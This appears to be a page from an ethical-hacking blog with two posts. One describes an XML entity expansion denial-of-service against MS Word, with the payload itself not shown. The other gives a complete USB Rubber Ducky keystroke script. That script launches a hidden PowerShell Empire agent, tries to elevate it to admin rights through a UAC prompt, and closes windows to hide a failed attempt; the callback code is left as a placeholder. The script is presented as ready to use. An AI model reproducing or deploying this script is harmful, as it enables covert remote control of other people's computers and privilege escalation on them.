Cyber Security Website

Ethical hacking

How to create a DoS condition with MS Word

In this post, I’ll show you how to create an application DoS with MS Word.

Just copy/paste the following XML payload over a Word document if you want to test (save all your work before doing it :))

XML Entity Expansion payload

MS Word parses and tries to resolve all of these entities, resulting (in some circumstances) in an out of system committed memory (virtual memory).

In restricted Desktops and multi-user environments limited to Microsoft Office, an attacker with basic user capabilities can cause a denial-of-service condition by pasting the XML payload into a Word document and therefore, impact other users working on the same environment.

I requested Microsoft to fix this issue, but since there is no further exploitability (no OOB-XXE), they told me that they will not fix anything.

Just another “Microsoft bug” (or feature) 😉

Launch a Empire stager with Admin privileges

A ducky payload that attempts to spawn an Empire agent directly with Admin privileges. Tested in Windows 7 & 10, should works fine even on slow PCs.

Generate the Powershell callback code with Empire Framework. Switch Base64 to “False” to decrease execution time.

DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
REM Launching a powershell empire agent in user's context
STRING powershell -W Hidden -nop -noni -c "Powershell Code"
ENTER
DELAY 200
GUI r
DELAY 1000
REM Trying to spawn an Empire agent with elevated privileges
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
STRING powershell -W Hidden -nop -noni -c "Powershell Code"
ENTER
DELAY 500
REM Close all windows in case of privesc attempt failure
ESCAPE